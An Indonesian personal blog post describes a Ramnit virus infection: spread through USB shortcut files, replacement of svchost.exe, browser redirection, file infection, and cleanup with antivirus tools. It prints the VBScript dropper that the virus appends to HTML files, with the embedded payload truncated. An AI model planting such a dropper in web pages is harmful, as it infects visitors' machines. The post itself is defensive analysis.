A Virus After A Long While

Ramn it! Setelah lebih dari satu tahun tidak berhubungan dengan yang namanya malicious software, saya kembali bertemu dengan virus. Ya, virus. Saya katakan virus karena program jahat ini menginfeksi file dengan cara masuk ke data file tersebut dan menambah ukurannya. Sudah lama saya tidak berhubungan dengan virus, karena beberapa tahun belakangan ini cuma kenal dengan worm, trojan, spyware, atau semacamnya. Memang, Ramnit ini juga memiliki karakteristik worm, tapi yang saya tekankan adalah kemampuan virus ini untuk masuk ke dalam file yang diinfeksinya.

Ramnit dan variannya menginfeksi file .exe, .dll, . htm, dan .html dan mampu menginjeksikan dirinya ke dalam file-file tersebut sehingga apabila file yang terinfeksi dijalankan akan menyebabkan sistem Anda terinfeksi. Varian yang menginfeksi sistem saya adalah W32/Ramnit.C (oleh Avira, atau Ramnit.A,B, dan J oleh MSE), yang menginfeksi sistem saya lewat USB Flashdisk Drive. Yang tidak biasa adalah dia tidak masuk dengan menggunakan Autorun biasa, karena saya mematikan fitur autorun untuk semua removable drive. Tapi dia bisa masuk secara otomatis apabila flashdisk dicolokkan.

Itu bisa terjadi karena di root directory FDD terdapat beberapa file shortcut (.lnk), tepatnya empat buah, dengan nama Copy to Shortcut to (1).lnk, Copy to Shortcut to (2).lnk, Copy to Shortcut to (3).lnk, dan Copy to Shortcut to (4).lnk. Entah karena celah keamanan dari Windows (saya menggunakan Windows XP SP3 yang tidak pernah di-update :P), file shortcut tersebut dijalankan secara otomatis apabila folder tersebut dibuka. Sekali lagi itu dilakukan secara otomatis tanpa menggunakan Autorun.inf. File tersebut akan menjalankan file virus di folder \RECYCLER\{angka dan kode} yang berisikan banyak file .exe dan .cpl dengan nama random yang berukuran 100KB (102400 Bytes). File-file itu adalah virus yang berdiri sendiri.

Ketika file virus tersebut dijalankan (secara otomatis oleh shortcut), dia akan me-replace file svchost.exe di %Windows%\System32. File svchost.exe adalah file yang mengurusi service di Windows, termasuk pada saat startup. Kemudian virus akan menjalankan proses yang disamarkan dengan memakai nama browser Internet yang sering dipakai, terutama iexplore.exe dan firefox.exe. Dengan menggunakan identitas palsu itu, virus bisa dengan leluasa mengakses Internet karena Firewall akan kebingungan dengan nama file executable-nya, dan mengira proses itu adalah browser yang sebenarnya.

Setelah virus berhasil menguasai browser, dia akan mengarahkan halaman yang kita buka ke website lain. Untuk kasus saya adalah ketika saya mengklik link dari google, dia akan mengarahkan ke website lain, sehingga saya harus Copy Link dan membukanya di tab kosong.

Seperti yang telah saya katakan, virus ini menginfeksi dengan masuk ke file yang diinfeksinya. Ciri-ciri yang tampak adalah dari ukuran file yang bertambah kira-kira 104KB untuk .exe dan .dll dan 200KB untuk .htm dan .html. Untuk file .exe dan .dll dia menginjeksikan secara binary, sehingga file hanya bertambah sesuai ukuran file virus yang asli. File .exe yang diinfeksi sekilas akan tampak sama persis dengan file yang tidak terinfeksi, seperti icon dan keterangan file (misal dari popup di Windows Explorer). Apabila file .exe ini dijalankan, dia akan membuat file baru di folder yang sama dengan nama namafilemgr.exe dengan ukuran 100KB. File baru ini terdeteksi sebagai virus Sality oleh Avira Antivir.

Untuk file .htm dan .html, dia akan menambahkan script di akhir file:

<SCRIPT language=”VBScript”><! —
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B8000000 // dst
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0 //
–>

Bisa kita lihat bahwa variabel Writedata adalah kode hexadesimal dari file executable virus yang digunakan untuk me-replace file svchost.exe. Kode teks hexadesimal ini 2x lebih panjang dari kode binarinya, sehingga ukuran file bertambah 2x lipat dari ukuran asli file virus, yaitu kira-kira 200KB. Anda boleh curiga apabila ukuran file .htm atau .html anda lebih dari 200KB. Terkadang (mungkin varian baru) virus juga menambahkan kode random yang dikurung dengan komen (<!–masukkan kode random di sini –>) di akhir script untuk menyulitkan program pembersih .htm dan .html (lihat di bawah).

Yang membuat saya jengkel dari virus ini adalah dia merajalela di semua partisi harddisk saya, termasuk installer laptop saya, sehingga saya yang biasanya suka main tanpa pelindung (baca: anti virus) terpaksa harus memakai anti virus untuk membersihkan virus ini. Ketika komputer Anda terinfeksi virus ini, sistem akan terasa sangat lambat karena virus akan men-scan semua partisi sistem untuk mencari file-file yang bisa diinfeksi, dan kemudia menginfeksi file-file tersebut. Virus juga akan menciptakan file-file shortcut di root tiap-tiap partisi, sehingga kalau Anda membuka partisi tersebut (misal: Anda booting dengan windows di partisi lain), sistem Anda akan terinfeksi secara otomatis.

Pada awalnya anti virus yang saya gunakan adalah Avira Antivir Personal untuk membersihkan file .exe dan .dll. Sedangkan untuk file .htm dan .html saya menggunakan VBSDropperRemover.jar (menggunakan Java). Karena Avira tidak bisa membersihkan tanpa menghapus file, akhirnya saya menggunakan MSE (Microsoft Security Essential) yang bisa benar-benar membersihkan virus dari file yang terinfeksi tanpa menghapus file tersebut. Untuk catatan, MSE hanya bisa digunakan apabila Windows yang anda gunakan terdeteksi sebagai genuine Windows.

One thought on “A Virus After A Long While

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s